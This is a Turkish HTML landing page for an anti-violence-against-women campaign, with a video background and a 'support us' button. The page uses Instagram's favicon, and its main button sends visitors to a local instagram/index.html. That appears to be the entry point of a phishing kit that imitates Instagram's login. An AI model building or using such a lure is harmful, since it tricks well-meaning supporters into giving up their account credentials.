
<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <script src="https://kit.fontawesome.com/db109e88ef.js" crossorigin="anonymous"></script> 
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="shortcut icon" href="https://instagram.com/static/images/ico/xxxhdpi_launcher.png/9fc4bab7565b.png">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
  <link rel="stylesheet" href="https://unpkg.com/aos@next/dist/aos.css" />
  <link rel="stylesheet" href="home-style.css">
  <style>
  </style>
    <title>Kadına Şiddete Hayır Kampanyası</title>
  </head>
  <body>
<div class="kapsa">
  <video autoplay muted loop id="myvideo">
  <source src="clip.mp4" type="video/mp4" style="width: 100vh;">
</video>
 <video autoplay muted loop id="myvideotel">
  <source src="clip.mp4" type="video/mp4" style="width: 100vh;">
</video>
    <div id="body" style="position: absolute; top: 0px; left: 0px;">
      <header>
    <div id="header">
 <span>

    <div class="header-right">
      <a href="https://www.ihd.org.tr/kadina-yel-ddete-hayir/"><p style="display: inline-block;">Biz kimiz</p></a>
      <a href="#copyright"><p style="display: inline-block;">Medyada Biz</p></a>
      <a href="http://anitsayac.com/"><p style="display: inline-block;">Anıtsayar</p></a>
      <i class="fas fa-search" style="display: inline-block;"></i>
    </div>
    </div>
  </header>
    <div id="content">
      <i class="fab fa-instagram"></i>
      <h1>DESTEK OL</h1>
      <p>Şiddete Engel Olmamıza Yardım Et</p>
      <center><a href="instagram/index.html">Instagram ile Destek Ol</a></center>
      <center><a href="http://anitsayac.com/" style="margin-top: 30px;">Şiddet Mağdurları</a></center>
    </div>
  </div>


  </script>
  </body>
</html>